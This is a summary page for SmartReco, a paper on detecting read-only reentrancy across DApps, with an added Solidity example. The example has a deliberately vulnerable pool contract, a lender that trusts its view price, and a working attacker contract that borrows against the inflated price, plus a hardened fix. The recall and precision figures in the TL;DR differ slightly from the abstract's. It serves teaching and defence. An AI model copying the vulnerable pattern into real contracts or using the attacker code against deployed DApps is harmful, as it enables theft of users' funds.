SmartReco: Detecting Read-Only Reentrancy via Fine-Grained Cross-DApp Analysis

Jingwen Zhang, Zibin Zheng, Yuhong Nan, Mingxi Ye, Kaiwen Ning, Yu Zhang, Weizhe Zhang

TL;DR

This work tackles Read-Only Reentrancy (ROR), a cross-DApp vulnerability that has caused substantial losses, by introducing SmartReco, a framework that combines cross-DApp boundary identification, fine-grained static analysis to locate entry points, and multi-function fuzzing across DApps to verify ROR. It replays on-chain transactions to collect DApp-level contextual data, prioritizes functions that can be manipulated across DApps, and uses targeted fuzzing to uncover valid attack paths. Evaluation on a manually labeled ROR dataset (precision 88.64%, recall 86.67%) and on large-scale real-world DApps shows that SmartReco detects 43 previously unreported RORs affecting around $520,000 in assets, outperforming existing tools. The work provides open-source tooling and datasets, underscoring the practical value of cross-DApp analysis for strengthening smart-contract security in the wild.

Abstract

Despite the increasing popularity of Decentralized Applications (DApps), they suffer from various vulnerabilities that can be exploited by adversaries for profit. Among such vulnerabilities, Read-Only Reentrancy (called ROR in this paper) is an emerging type of vulnerability that arises from the complex interactions between DApps. In the past three years, ROR attack incidents have already caused around 30M USD in losses to the DApp ecosystem. Existing techniques for vulnerability detection in smart contracts can hardly detect Read-Only Reentrancy attacks, because they do not track and analyze the complex interactions between multiple DApps. In this paper, we propose SmartReco, a new framework for detecting Read-Only Reentrancy vulnerabilities in DApps through a novel combination of static and dynamic analysis (i.e., fuzzing) over smart contracts. The key design behind SmartReco is threefold: (1) SmartReco identifies the boundary between different DApps from the heavily coupled cross-contract interactions. (2) SmartReco performs fine-grained static analysis to locate points of interest (i.e., entry functions) that may lead to ROR. (3) SmartReco utilizes on-chain transaction data and performs multi-function fuzzing (i.e., of the entry function and the victim function) across different DApps to verify the existence of ROR. Our evaluation on a manually labeled dataset with 45 RORs shows that SmartReco achieves a precision of 88.63% and a recall of 86.36%. In addition, SmartReco successfully detects 43 new RORs from 123 popular DApps. The total assets affected by such RORs reach around 520,000 USD.
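The vulnerability class the abstract describes, as an added Solidity example that is not from the paper or its artifact: the contracts Pool, Lender and Attacker and all of their functions are hypothetical. Pool's view function price() reads two storage slots that are only mutually consistent once a withdrawal has completed; Lender, a separate DApp, prices collateral with that view and has no reentrancy of its own, so neither contract looks wrong in isolation. In the abstract's terms (my mapping, not the paper's), Pool.withdrawVulnerable plays the entry function that hands control to the attacker and Lender.borrow the victim function that consumes the stale view.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// Constructed illustration of read-only reentrancy (ROR). Not code from the
// SmartReco paper; Pool, Lender, Attacker and all function names are hypothetical.

// DApp A: a toy ETH pool. price() reads two storage slots that are only
// consistent with each other once a withdrawal has fully completed.
contract Pool {
    uint256 public totalShares;
    uint256 public reserve;                     // ETH accounted for, in wei
    mapping(address => uint256) public shares;
    bool public locked;                         // held only by the hardened path

    function deposit() external payable {
        uint256 minted = totalShares == 0 ? msg.value : msg.value * totalShares / reserve;
        shares[msg.sender] += minted;
        totalShares += minted;
        reserve += msg.value;
    }

    // VULNERABLE: shares are burned, ETH is sent (handing control to the caller),
    // and only then is reserve reduced. During the callback reserve/totalShares
    // is inflated: withdrawing 50 of 100 shares from a 100-wei pool leaves
    // reserve = 100, totalShares = 50, so price() reports 2e18 instead of 1e18.
    function withdrawVulnerable(uint256 amount) external {
        require(shares[msg.sender] >= amount, "insufficient shares");
        uint256 payout = amount * reserve / totalShares;
        shares[msg.sender] -= amount;
        totalShares -= amount;
        (bool ok, ) = msg.sender.call{value: payout}("");   // reentrancy point
        require(ok, "transfer failed");
        reserve -= payout;                                  // settled too late
    }

    // HARDENED: every effect is applied before the external call, and a lock is
    // held across it. price() refuses to answer while the lock is held, so no
    // consumer can observe a mid-transaction state even if the ordering regresses.
    function withdrawSafe(uint256 amount) external {
        require(!locked, "reentrant");
        locked = true;
        require(shares[msg.sender] >= amount, "insufficient shares");
        uint256 payout = amount * reserve / totalShares;
        shares[msg.sender] -= amount;
        totalShares -= amount;
        reserve -= payout;                                  // effects first
        (bool ok, ) = msg.sender.call{value: payout}("");
        require(ok, "transfer failed");
        locked = false;
    }

    // Price per share, scaled by 1e18.
    function price() external view returns (uint256) {
        require(!locked, "pool busy");                      // the ROR guard
        if (totalShares == 0) return 1e18;
        return reserve * 1e18 / totalShares;
    }
}

// DApp B: a lender that values Pool shares via Pool.price(). It never calls
// Pool's state-changing functions, so analysing B alone, or A alone, misses the bug.
contract Lender {
    Pool public immutable pool;
    mapping(address => uint256) public collateralShares;    // bookkeeping only; custody omitted
    mapping(address => uint256) public debt;
    constructor(Pool p) { pool = p; }

    function lockCollateral(uint256 amount) external { collateralShares[msg.sender] += amount; }

    // 50% loan-to-value against Pool shares at the current price
    function maxBorrow(address user) public view returns (uint256) {
        return collateralShares[user] * pool.price() / 1e18 / 2;
    }

    function borrow(uint256 amount) external {
        require(debt[msg.sender] + amount <= maxBorrow(msg.sender), "exceeds LTV");
        debt[msg.sender] += amount;
        // transfer of the borrowed asset omitted
    }
}

// Attack path: post half the shares as collateral, withdraw the other half, and
// borrow from inside the ETH callback while price() is inflated. With 100 wei
// deposited the callback sees maxBorrow = 50 instead of the honest 25.
contract Attacker {
    Pool private immutable pool;
    Lender private immutable lender;
    constructor(Pool p, Lender l) { pool = p; lender = l; }

    function run() external payable {
        pool.deposit{value: msg.value}();
        uint256 half = pool.shares(address(this)) / 2;
        lender.lockCollateral(half);
        pool.withdrawVulnerable(half);   // hands control to receive() below
    }

    receive() external payable {
        lender.borrow(lender.maxBorrow(address(this)));
    }
}
```

Against withdrawVulnerable the transaction completes with twice the legitimate debt recorded at Lender. Against withdrawSafe the same attacker fails in two independent ways: reserve is already reduced when the callback runs, so price() would be honest, and the lock makes price() revert anyway, which propagates through borrow() and the low-level call and reverts the whole transaction. The second defence matters because consumers like Lender cannot verify the first one from outside, which is exactly the cross-DApp blind spot the paper targets.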

Paper Structure

This paper contains 26 sections, 1 equation, 8 figures, 3 tables and 1 algorithm.

Figures (8)

  • Figure 1: An example of Read-Only Reentrancy.
  • Figure 2: The attack process of the example in Fig. 1.
  • Figure 3: The workflow of SmartReco.
  • Figure 4: Two methods for deploying smart contracts.
  • Figure 5: Rules for constructing intra-DApp graph.
  • ...and 3 more figures